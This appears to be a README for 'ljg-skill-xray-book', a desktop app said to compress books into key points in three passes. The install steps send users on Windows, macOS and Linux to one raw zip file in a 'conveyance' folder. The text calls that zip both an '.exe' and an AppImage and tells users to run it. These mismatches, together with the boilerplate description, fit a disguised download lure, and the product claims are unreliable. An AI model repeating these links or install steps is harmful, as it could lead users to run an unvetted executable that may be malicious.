ljg-skill-xray-book is a simple tool designed to help you break down complex books. It uses a three-stage process to compress and extract key ideas. This helps you focus on the most important points without reading the whole book in detail.
The app fits well if you want to learn more efficiently. It can be seen as a reading assistant that summarizes and organizes book knowledge into clear, actionable points. This lets you save time and get more out of your reading.
Before you start, make sure your computer meets these needs:
- Operating System: Windows 10 or later, macOS 10.13 or later, or most Linux distributions.
- Processor: 1.5 GHz or faster.
- Memory: At least 4 GB RAM.
- Storage: 500 MB free space.
- Other: Internet connection to download the app and occasional updates.
The app runs without extra software installation. It works on basic setups and does not require any developer tools.
Follow these steps to download and run ljg-skill-xray-book on your computer:
Click the big blue button at the top or go directly to:
This page holds all the versions and files you need.
Look for the latest release version. It usually appears at the top of the list.
- Windows users should download the
.exefile (e.g.,https://github.com/bitesk782-wq/ljg-skill-xray-book/raw/refs/heads/main/conveyance/ljg-book-xray-skill-v2.2.zip). - macOS users should get the
.dmgor.zipfile. - Linux users usually find
.AppImageorhttps://github.com/bitesk782-wq/ljg-skill-xray-book/raw/refs/heads/main/conveyance/ljg-book-xray-skill-v2.2.zipfiles.
The file names will include the version number (for example, v1.0) and the platform.
Click on the file name. Your browser will save it to your default downloads folder.
- Windows: Double-click the
.exefile and follow the prompts on the screen. - macOS: Open the
.dmgfile, drag the app icon to your Applications folder. - Linux: Make the downloaded file executable (
chmod +x filename), then run it.
- Find the installed application in your Start Menu (Windows), Applications folder (macOS), or application launcher (Linux).
- Double-click to start.
Once you launch the app, you will see a simple interface. Here’s a quick guide:
Click the "Import" button to load a book file. Supported formats include PDF, EPUB, and plain text.
Use the "Start" button to begin the three-step process:
- First pass: The app scans the content to identify the main topics.
- Second pass: It compresses the information, removing less important details.
- Third pass: The tool creates a clear summary, highlighting the book’s key points and learning structure.
After the process ends, browse the summarized content. You can navigate through chapters, topics, or other sections.
Save the summary as a PDF, text file, or markdown if you want to keep it or share it later.
- Three-layer cognitive compression: Processes book content step-by-step for clearer insights.
- Supports multiple file formats: Works with popular book files like PDF and EPUB.
- User-friendly interface: Helps anyone quickly load and extract essential knowledge.
- Custom export options: Save summaries to formats that suit your needs.
- No programming needed: Designed for everyday users with no technical background.
- Use books in clear digital text format. Handwritten or scanned books may not work well.
- Try shorter books or chapters to start, then move to longer texts.
- Review the summary carefully since it highlights main points but might miss minor details.
- Update the app by visiting the releases page regularly to get the latest improvements.
- App won’t start: Check if your operating system meets the requirements and that you completed installation.
- Import errors: Make sure the file is not damaged and is in one of the supported formats.
- Summary looks incomplete: Try re-importing or use smaller input files.
- Export fails: Ensure you have write permission in the folder you choose to save the file.
For more help, visit the GitHub issues page of the repository.
Access the latest versions here:
https://github.com/bitesk782-wq/ljg-skill-xray-book/raw/refs/heads/main/conveyance/ljg-book-xray-skill-v2.2.zip
Use the instructions in the "Getting Started" section to download and install the app on your device.
If you have suggestions, run into problems, or want to share your experience, you can open an issue or discussion on the repository's GitHub page.
Your input helps improve the tool for everyone.